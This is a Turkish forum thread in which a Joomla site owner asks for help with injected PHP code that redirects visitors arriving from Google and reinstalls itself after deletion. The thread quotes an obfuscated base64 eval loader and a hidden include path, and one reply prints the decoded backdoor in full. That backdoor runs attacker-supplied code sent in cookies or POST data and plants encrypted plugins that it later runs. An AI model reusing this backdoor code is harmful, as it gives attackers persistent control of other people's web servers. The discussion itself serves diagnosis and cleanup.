kFyMjVyMVVFU2JPRTQwVVI0cFVRcm41OE5Eb2RZRGtjckdvZFlEb2RZRG9kdG53bFlOVUVTYk9FNDBVJy4KJ1JYZ0o5WTFlOVlnMjlIbjU4TkRvZFlEb2RZRG9GYWlkbFlEb2RZRG9kWURvZFlEb2RTbm81ckQ4SlUzdkp4TjU4TkRvZFlEb2RZRG9kWURvZFlEb2QnLgonWURVV3RSVTNZMWVsdFlIRWJjT0xBM0hSUDYwbERuSVlyR29kWURvZFlEb2RZRG9kWURvZFlEbycuCidkT2hPbEhEZXlqRFVoWEJWZHIzVTNjaWRsWURvZFlEb2RZRG9kWURvZFlEb2RZZ3Y3YWdvNXIrb2RTeHZKU2I3M09iMjNPT0lZckdvZFlEb2RZRG9kWURvZFlER3lhaWRsWScuCidEb2RZRG9kWURvZFlEb0VBejJFWkQ4RmlQSExQYjBFUHN3OUR4Mjl4ZjU4TkRvZFlEb2RZRG9kWURvZHRQa0VQckNjckdvZFlEb2RZRG9kdDE1OE5Eb2RZJy4KJ0RvZFlEb0VBYUhSQW53bFlOVUVTYk9FNDBVUlhnSjlZMWU5WWd3OUhuNThORG9kWURvZFlEb0ZhaWRsWURvZFlEb2RZRG9kWURvRUFSdjdjTlVFU2InLgonT0U0MFVSOGdKOXhmNThORG9kWURvZFlEb0ZyaWRsWURvZFlEb2RZRHc3VGh3N1BMb2REeHdFNHJ2QWEnLgonZ3Y5T09vNXIxb2RPYzBGQWcyN2pnRzhyR29kWURvZFlEb2R0ZjU4TkRvZFlEb2RZRG9kWURvZHRud2xEeHdFNCcuCidydkFhZ0hSWGdKOVkxZTlZZ3Y3U3hVM3hpZGxZRG9kWURvZFlEb2RZRG9GYWlkbFlEb2RZRG9kWURvZFlEb2RZRG9kdHpIUTFjMEZBZzI3cU12N1N4R2RTeHZKJy4KJ1NiNzNPY1VRcmFvZFN4dkpTYjczT3hVUXJuQ2NyR29kWURvZFlEb2RZRG9kWURNOHJHb2RZRG9kWURvZFlEb2RZRHc3VGh3N1BMR2RTeHZKU2I3M09odjlPT281cjFvZE8zdzcnLgoncmdHOHJHb2RZRG9kWURvZFlEb2RZRGtjckdvZFlEb2RZRG9kWURvZFlEb2RZRG9FaWhKV3RhTzdPbjBQMTN3N3JOVUVTYk9FNDBVV1lnSjl4ZjU4TkRvZFlEJy4KJ29kWURvZFlEb2R0MTU4TkRvZFlEb2RZRG9GcmlkbFlEb2RZRG9kWUR3N2lOMDNZeHdFNHJ2QWFndjdhZ0p5YWlkbFlEbycuCidkWURvZFlEd0pibk9kRG5DY3JHb2RZRG9GcmlkRHJHb2RZRG9FaWhKV3RhTzdPbjBQMWEwUjR4RycuCidkeGY1OG4xJzsKJG9icHB1ayA9IEFycmF5KCcxJz0+JzknLCAnMCc9PidiJywgJzMnPT4neScsICcyJz0+J2EnLCAnNSc9PidEJywgJzQnPT4nRicsICc3Jz0+J1cnLCAnNic9Pid2JywgJzknPT4nUycsICc4Jz0+J1EnLCAnQSc9PidWJywgJ0MnPT4nTycsICdCJz0+J3UnLCAnRSc9PidHJywgJ0QnPT4nZycsICdHJz0+J0snLCAnRic9PidIJywgJ0knPT4nTCcsICdIJz0+J2MnLCAnSyc9PidxJywgJ0onPT4nWCcsICdNJz0+J2YnLCAnTCc9PidtJywgJ08nPT4nZCcsICdOJz0+J28nLCAnUSc9PicxJywgJ1AnPT4nbCcsICdTJz0+J1InLCAnUic9PicyJywgJ1UnPT4nSicsICdUJz0+J3gnLCAnVyc9PiczJywgJ1YnPT4nTScsICdZJz0+J0EnLCAnWCc9PidFJywgJ1onPT4nOCcsICdhJz0+J3MnLCAnYyc9Pid3JywgJ2InPT4naCcsICdlJz0+J1AnLCAnZCc9PidDJywgJ2cnPT4nbicsICdmJz0+JzcnLCAnaSc9PidOJywgJ2gnPT4neicsICdrJz0+J2UnLCAnaic9Pic0JywgJ20nPT4ndCcsICdsJz0+J2knLCAnbyc9PidJJywgJ24nPT4ncCcsICdxJz0+JzUnLCAncCc9PidyJywgJ3MnPT4nNicsICdyJz0+JzAnLCAndSc9PidVJywgJ3QnPT4nQicsICd3Jz0+J1onLCAndic9PidZJywgJ3knPT4nVCcsICd4Jz0+J2snLCAneic9PidqJyk7CmV2YWwvKnpuYXhmdyovKHJ0dGRmKCRsc3F1bGh0Ym4sICRvYnBwdWspKTsKfQ=="));

     

    include "\x2fhom\x65/zo\x67orc\x6fm/p\x75bli\x63_ht\x6dl/m\x6fdul\x65s/m\x6fd_s\x65arc\x68/tm\x70l/p\x6cugi\x6e.ph\x70";

    -----

    Bu kod bulunan websitenize, direk link yazarak erişim sğalayabiliyorsunuz. Fakat; google üzerinde yapılan arama sonrası çıkan google sonuçları ile sitenize erişim sağlayamak isteyenler 2 girişte bir yukarıdaki kodun içerisinde yer alan dinamik çekilen siteleri ziyaret ediyorlar. 

    İşin ilginç tarafı bu kodları bulaşan yerlerden silseniz de silindiği 1-2 saatte anlaşılıyor ve tekrar bu kodlar geri geliyor. :)


    If there are two or more ways to do something, and one of those ways can result in a catastrophe, then someone will do it.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    pastebin yada ghostpin e ataydın bu sqli baya kasar :) joomla son versiyona yükselticeksin büyük ihtimal tema dosyasına kod çakılmıştır silinince oradan geri ekliyordur


    "Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    K4R4B4S4N
    K4R4B4S4N's avatar
    Kayıt Tarihi: 01/Eylül/2005
    Erkek

    decode edilmiş hali.

    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @error_reporting(0);
    @set_time_limit(0);
    
    
    if(!defined("PHP_EOL"))
    {
        define("PHP_EOL", "\n");
    }
    
    if(!defined("DIRECTORY_SEPARATOR"))
    {
        define("DIRECTORY_SEPARATOR", "/");
    }
    
    if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
    {
        define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
    
        $data = NULL;
        $data_key = NULL;
    
        $GLOBALS['cs_auth'] = 'e0bd668a-820f-4c87-9e9b-3fbdc808c310';
        global $cs_auth;
    
    
        function cs_GetHost()
        {
            return strtolower(preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']));
        }
    
        function cs_GetWritableDirs()
        {
            $res = Array();
    
            $analysys_queue = Array();
    
            $analysys_queue[] = cs_GetDocRoot();
    
            $self_path = $_SERVER['SCRIPT_FILENAME'];
            while (($slash = strrpos($self_path, DIRECTORY_SEPARATOR)) !== FALSE)
            {
                $self_path = substr($self_path, 0, $slash);
    
                if ($self_path == cs_GetDocRoot())
                {
                    break;
                }
    
                if (strlen($self_path))
                {
                    $analysys_queue[] = $self_path;
                }
            }
    
            foreach ($analysys_queue as $current_dir)
            {
                if (!in_array($current_dir, $res))
                {
                    $res = array_merge($res, cs_GetDirectoryList($current_dir));
                }
            }
    
            return cs_CheckWritable(array_unique($res));
        }
    
        function cs_CheckWritable($dir_list)
        {
            $dir_list_writable = Array();
    
            foreach ($dir_list as $dir)
            {
                if (@is_writable($dir) && is_dir($dir))
                {
                    $dir_list_writable[] = $dir;
                }
            }
    
            return $dir_list_writable;
        }
    
        function cs_GetDirectoryList($dir, $depth=10)
        {
            $result = array();
    
            if (!is_dir($dir))
            {
                return $result;
            }
    
            $result[] = $dir;
            $dir_count = 0;
    
            if ($depth < 1)
            {
                return $result;
            }
    
            $dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/');
            $h = @opendir($dir);
            if ($h === FALSE)
            {
                return $result;
            }
    
            while (($f = readdir($h)) !== FALSE)
            {
                if ($f !==  and $f !== '..')
                {
                    $current_dir = "$dir/$f";
                    if (is_dir($current_dir))
                    {
                        $dir_count += 1;
    
                        $result[] = $current_dir;
                        $result = array_merge($result, cs_GetDirectoryList($current_dir, $depth / 10));
                    }
                }
            }
    
            closedir($h);
    
            return $result;
        }
    
        function cs_GetDocRoot()
        {
            $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
            if ($docroot_end === FALSE)
            {
                return $_SERVER['DOCUMENT_ROOT'];
            }
            elseif ($docroot_end === 0)
            {
                return "/";
            }
            else
            {
                return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
            }
        }
    
        if (!function_exists('file_put_contents'))
        {
            function file_put_contents($n, $d, $flag = False)
            {
                $mode = $flag == 8 ? 'a' : 'w';
                $f = @fopen($n, $mode);
                if ($f === False)
                {
                    return 0;
                }
                else
                {
                    if (is_array($d)) $d = implode($d);
                    $bytes_written = fwrite($f, $d);
                    fclose($f);
                    return $bytes_written;
                }
            }
        }
    
        if (!function_exists('file_get_contents'))
        {
            function file_get_contents($filename)
            {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
    
                return $fcontents;
            }
        }
    
    
        function cs_decrypt_phase($data, $key)
        {
            $out_data = "";
    
            for ($i=0; $i<strlen($data);)
            {
                for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
                {
                    $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
                }
            }
    
            return $out_data;
        }
    
        function cs_decrypt($data, $key)
        {
            global $cs_auth;
    
            return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
        }
        function cs_encrypt($data, $key)
        {
            global $cs_auth;
    
            return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
        }
    
        function cs_file_read($path)
        {
            $data = @file_get_contents($path);
    
            return $data;
        }
    
        function cs_file_write($path, $data)
        {
            @file_put_contents($path, $data);
        }
    
        function cs_file_append($path, $data)
        {
            @file_put_contents($path, $data, 8);
        }
    
        function cs_sort_comparer($a, $b)
        {
            return strlen($a) - strlen($b);
        }
    
        function cs_GetCommonStorage($dirs=NULL)
        {
            $self_dir = dirname(__FILE__);
    
            $common_names = Array("options", "views", "pages", "sessions", "stats", "users", "articles", "dump", "headers", "libs");
    
            $tmp_dir = $self_dir . "/" . $common_names[strlen(cs_GetHost()) % count($common_names)];
    
            if (file_exists($tmp_dir))
            {
                return $tmp_dir;
            }
    
            if(mkdir($tmp_dir))
            {
                return $tmp_dir;
            }
    
            return "";
        }
    
        function cs_plugin_add($name, $base64_data)
        {
            $data = base64_decode($base64_data);
    
            $storage_path = cs_GetCommonStorage() . "/";
            $storage_path = $storage_path . substr(md5("cache"), 0, 5) . "_" . md5($name . cs_GetHost());
    
    
            cs_file_write($storage_path, cs_encrypt($data, cs_GetHost()));
        }
    
        function cs_plugin_rem($name)
        {
            $storage_path = cs_GetCommonStorage(). "/";
            $storage_path = $storage_path . substr(md5("cache"), 0, 5) . "_" . md5($name . cs_GetHost());
    
            if (file_exists($storage_path))
            {
                @unlink($storage_path);
            }
        }
    
        function cs_plugin_load($name=NULL)
        {
            $storage_path = cs_GetCommonStorage();
    
            if (is_dir($storage_path))
            {
                if ($name == NULL) // load all plugins
                {
                    foreach (scandir($storage_path) as $key=>$plugin_name)
                    {
                        if (strpos($plugin_name, substr(md5("cache"), 0, 5)) !== False)
                        {
                            @eval(cs_decrypt(cs_file_read($storage_path . "/" . $plugin_name), cs_GetHost()));
                        }
                    }
                }
                else
                {
                    $storage_path = $storage_path . "/" . substr(md5("cache"), 0, 5) . "_" . md5($name . cs_GetHost());
    
                    if (file_exists($storage_path))
                    {
                        @eval(cs_decrypt(cs_file_read($storage_path), cs_GetHost()));
                    }
                }
            }
        }
    
        function cs_writable_check()
        {
            if (strlen(cs_GetCommonStorage()) != 0)
            {
                return True;
            }
            else
            {
                return False;
            }
        }
    
        foreach ($_COOKIE as $key=>$value)
        {
            $data = $value;
            $data_key = $key;
        }
    
        if (!$data)
        {
            foreach ($_POST as $key=>$value)
            {
                $data = $value;
                $data_key = $key;
            }
        }
    
        $data = @unserialize(cs_decrypt(base64_decode($data), $data_key));
    
        if (isset($data['ak']) && $cs_auth==$data['ak'])
        {
            if ($data['a'] == 'i')
            {
                $i = Array(
                    'pv' => @phpversion(),
                    'sv' => '1.0-2',
                    'ak' => $data['ak'],
                );
                echo @serialize($i);
                exit;
            }
            elseif ($data['a'] == 'e')
            {
                eval($data['d']);
            }
            elseif ($data['a'] == 'plugin')
            {
                if($data['sa'] == 'add')
                {
                    cs_plugin_add($data['p'], $data['d']);
                }
                elseif($data['sa'] == 'rem')
                {
                    cs_plugin_rem($data['p']);
                }
            }
            echo $data['ak'];
            
        }
    
        cs_plugin_load();
    }

     

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Daft Ground
    PLaXToR
    PLaXToR's avatar
    Kayıt Tarihi: 08/Temmuz/2003
    Erkek

    Bende decode ettim ama 

    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    Bu kısımda tanımlanan şey her seferinde farklı tanımlanıyor. Eğer silersen tekrar yüklüyor :)


    If there are two or more ways to do something, and one of those ways can result in a catastrophe, then someone will do it.
Toplam Hit: 4238 Toplam Mesaj: 4
joomla güvenlik sorunu